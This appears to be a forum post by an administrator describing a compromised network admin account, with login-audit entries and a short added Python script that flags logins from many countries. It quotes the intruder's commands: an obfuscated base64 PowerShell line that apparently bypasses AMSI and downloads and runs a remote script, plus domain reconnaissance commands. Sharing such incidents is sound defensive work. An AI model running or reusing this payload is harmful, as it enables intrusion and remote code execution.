I got one of these 2 weeks ago (which I missed as I was on holiday) and then this morning. Checked and there have been multiple failed and successful logins to a second admin account from all over the world. admin2 is the compromised account. admin1 is mine.

admin2@local.com 193.56.73.134 , Turkey Login Failure Sat, 03 Dec 2022 16:32:22 GMT
admin2@local.com 89.187.185.171 Los Angeles, CA Login Failure Sat, 03 Dec 2022 14:25:11 GMT
admin2@local.com 193.202.9.119 Clinton, MD Login Success Sat, 19 Nov 2022 23:20:38 GMT
admin1@local.com 212.60.21.161 Barnsbury, United Kingdom Login Failure Fri, 18 Nov 2022 05:41:00 GMT
admin1@local.com 85.239.35.184 , Russian Federation Login Failure Wed, 16 Nov 2022 17:19:25 GMT
admin1@local.com 185.68.154.40 , Login Failure Fri, 11 Nov 2022 01:07:37 GMT
admin2@local.com 185.61.217.156 Chisinau, Moldova Login Failure Wed, 09 Nov 2022 17:01:43 GMT
admin1@local.com 45.132.186.237 , Australia Login Failure Wed, 09 Nov 2022 16:54:31 GMT
admin2@local.com 45.10.164.207 , Canada Login Failure Wed, 09 Nov 2022 14:41:08 GMT
admin2@local.com 171.22.30.220 Amsterdam, Netherlands Login Success Fri, 28 Oct 2022 22:15:33 GMT
admin1@local.com 194.156.124.37 London, United Kingdom Login Failure Sun, 23 Oct 2022 22:24:20 GMT
admin2@local.com 193.233.251.191 Sheridan, WY Login Failure Sun, 23 Oct 2022 15:38:49 GMT
admin1@local.com 185.94.34.99 , Login Failure Wed, 12 Oct 2022 12:18:20 GMT
admin1@local.com 88.218.45.62 Amsterdam, Netherlands Login Failure Tue, 11 Oct 2022 20:50:44 GMT
admin2@local.com 45.140.204.187 , China Login Success Sat, 08 Oct 2022 19:08:14 GMT
admin2@local.com 45.138.100.147 Frankfurt Am Main, Germany Login Success Sat, 08 Oct 2022 09:23:25 GMT
admin2@local.com 95.216.4.218 Tuusula, Finland Login Success Mon, 03 Oct 2022 20:23:18 GMT
admin2@local.com 89.22.239.167 Moskva, Russian Federation Login Success Mon, 03 Oct 2022 06:21:11 GMT
admin2@local.com 193.56.65.139 , Turkey Login Success Sun, 02 Oct 2022 20:19:32 GMT
admin1@local.com 193.203.9.179 , United Kingdom Login Failure Fri, 30 Sep 2022 04:27:16 GMT
admin2@local.com 185.61.218.92 Montauban, France Login Failure Fri, 30 Sep 2022 03:50:17 GMT
admin2@local.com 45.80.105.83 , United Kingdom Login Failure Wed, 28 Sep 2022 14:11:59 GMT
admin1@local.com 91.243.190.219 , China Login Failure Tue, 27 Sep 2022 17:44:48 GMT
admin1@local.com 85.239.36.154 , Germany Login Failure Tue, 27 Sep 2022 06:51:20 GMT
admin1@local.com 83.142.55.240 , United Kingdom Login Failure Tue, 27 Sep 2022 00:52:51 GMT
admin1@local.com 37.44.197.32 , Poland Login Failure Mon, 26 Sep 2022 10:47:34 GMT
admin1@local.com 194.104.8.233 , Canada Login Failure Mon, 19 Sep 2022 22:51:48 GMT
admin1@local.com 45.148.234.11 , United Kingdom Login Failure Thu, 15 Sep 2022 02:22:15 GMT

What's strange is this admin2 account was created about 6 years ago and never used. What's more confusing is that the person's email account never got any of the emails with a confirmation code to login with (perhaps something with it being so old it doesn't get it?). What's not confusing is what they were up to...
Command Line request command: powershell -e DQAKAFAAbwB3AGUAcgBTAGgAZQBsAGwALgBlAHgAZQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAAaABpAGQAZABlAG4AIAB7AA0ACgAkAGEAPQAiADUANAA5ADIAOAA2ADgANwA3ADIAOAAwADEANwA0ADgANgA4ADgAMQA2ADgANwA0ADcAMgA4ADAANwAyADgAMQA4ADcAMQA3ADMANgA4ADgAOAA3ADgAMgA4ADAANgA4ADgANwA3ADYAOAAyADgAIgANAAoAJABiAD0AIgAxADEANwAzADYAOAAwADgANgA3ADYANQA2ADgANwA3ADYANwA5ADgANgA2ADgAOAAwADgANgA3ADYANAA0ADgAMQA3ADYAOAA3ADQAMQA2ADgANwA2ADcAOQA3ADIANwAxACIADQAKACQAYwA9AFsAcwB0AHIAaQBuAGcAXQAoADAALgAuADMANwB8ACUAewBbAGMAaABhAHIAXQBbAGkAbgB0AF0AKAAyADkAKwAoACQAYQArACQAYgApAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAoACQAXwAqADIAKQAsADIAKQApAH0AKQAtAHIAZQBwAGwAYQBjAGUAIAAiACAAIgANAAoAJABkAD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACQAYwApAA0ACgAkAGUAPQBbAHMAdAByAGkAbgBnAF0AKAAzADgALgAuADUAMQB8ACUAewBbAGMAaABhAHIAXQBbAGkAbgB0AF0AKAAyADkAKwAoACQAYQArACQAYgApAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAoACQAXwAqADIAKQAsADIAKQApAH0AKQAtAHIAZQBwAGwAYQBjAGUAIAAiACAAIgANAAoAJABmAD0AJABkAC4ARwBlAHQARgBpAGUAbABkACgAJABlACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQANAAoAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkADQAKAEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADQALgAxADgAMAAuADQAOAAuADEAMQA2ADoANAA3ADQANAAzAC8AcwB2AGMAaABvAHMAdAAuAHAAcwAxACcAKQApAA0ACgB9AA0ACgA=
Command Line request command: powershell (Get-ADComputer -Filter *).Count
Command Line request command: net users /domain

The PC it was run on seems fine; ran 3 different AV/anti-malware tools and Autoruns (open to anything else worth running on it). The other 5 PCs on the network we've run the above on and they seem fine. Unfortunately all the event logs have rolled over from the date it occurred 😞 I won't lie, admin2 probably had a crappy password but not sure how they got around the email alerts (will be looking at the user's laptop soon). Awaiting a call from Meraki now to speak to them about it...
will update if anything interesting... Merry Christmas!
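Added example, not part of the original post: a small Python script that parses login-audit lines in the same "user ip city, country Login Success/Failure date" format quoted above and flags any account whose successful logins come from more than two distinct countries inside a 30-day window, together with per-account failure counts. The sample lines are a subset of the entries from the post; the thresholds (two countries, 30 days) and the function names are assumptions chosen for the example.

```python
"""Flag admin accounts with successful logins from many countries.

Added example, not code from the original post. Parses audit lines in the
format quoted in the post and applies a simple multi-country rule.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a subset of the audit entries from the post, one per line.
SAMPLE_LOG = """\
admin2@local.com 193.56.73.134 , Turkey Login Failure Sat, 03 Dec 2022 16:32:22 GMT
admin2@local.com 193.202.9.119 Clinton, MD Login Success Sat, 19 Nov 2022 23:20:38 GMT
admin1@local.com 212.60.21.161 Barnsbury, United Kingdom Login Failure Fri, 18 Nov 2022 05:41:00 GMT
admin2@local.com 171.22.30.220 Amsterdam, Netherlands Login Success Fri, 28 Oct 2022 22:15:33 GMT
admin2@local.com 45.140.204.187 , China Login Success Sat, 08 Oct 2022 19:08:14 GMT
admin2@local.com 45.138.100.147 Frankfurt Am Main, Germany Login Success Sat, 08 Oct 2022 09:23:25 GMT
admin2@local.com 95.216.4.218 Tuusula, Finland Login Success Mon, 03 Oct 2022 20:23:18 GMT
admin2@local.com 89.22.239.167 Moskva, Russian Federation Login Success Mon, 03 Oct 2022 06:21:11 GMT
admin1@local.com 45.148.234.11 , United Kingdom Login Failure Thu, 15 Sep 2022 02:22:15 GMT
"""

# "user ip city, country Login Result Day, DD Mon YYYY HH:MM:SS GMT"
# The city may be empty (the post shows " , Turkey"), so it is [^,]*.
LINE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+"
    r"(?P<city>[^,]*),\s*(?P<country>.*?)\s+"
    r"Login (?P<result>Success|Failure)\s+"
    r"(?P<date>\w{3}, \d{2} \w{3} \d{4} \d{2}:\d{2}:\d{2}) GMT$"
)


def parse_log(text):
    """Turn audit lines into event dicts; raise on a line that does not match."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unparsed line: {line!r}")
        events.append({
            "user": m["user"],
            "ip": m["ip"],
            "country": m["country"].strip() or "unknown",
            "success": m["result"] == "Success",
            "time": datetime.strptime(m["date"], "%a, %d %b %Y %H:%M:%S"),
        })
    return events


def flag_accounts(events, max_countries=2, window_days=30):
    """Return {user: sorted countries} for every account whose successful
    logins span more than max_countries distinct countries within any
    window_days-long window (thresholds are assumptions for this example)."""
    by_user = defaultdict(list)
    for e in events:
        if e["success"]:
            by_user[e["user"]].append(e)
    window = timedelta(days=window_days)
    flagged = {}
    for user, logins in by_user.items():
        logins.sort(key=lambda e: e["time"])
        for i, end in enumerate(logins):
            # Countries seen in the window ending at this login.
            countries = {e["country"] for e in logins[: i + 1]
                         if end["time"] - e["time"] <= window}
            if len(countries) > max_countries:
                flagged[user] = sorted(countries)
                break
    return flagged


def failure_counts(events):
    """Count failed logins per account (useful alongside the success rule)."""
    counts = defaultdict(int)
    for e in events:
        if not e["success"]:
            counts[e["user"]] += 1
    return dict(counts)


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for user, countries in flag_accounts(evs).items():
        print(f"FLAG {user}: successful logins from {', '.join(countries)}")
    print("failures:", failure_counts(evs))
```

On the sample above only admin2 is flagged, because three successes from different countries fall within a single window in early October; admin1 has failures only and never trips the rule. A rule like this is a coarse substitute for the per-login alert the post describes as missing, not a replacement for it.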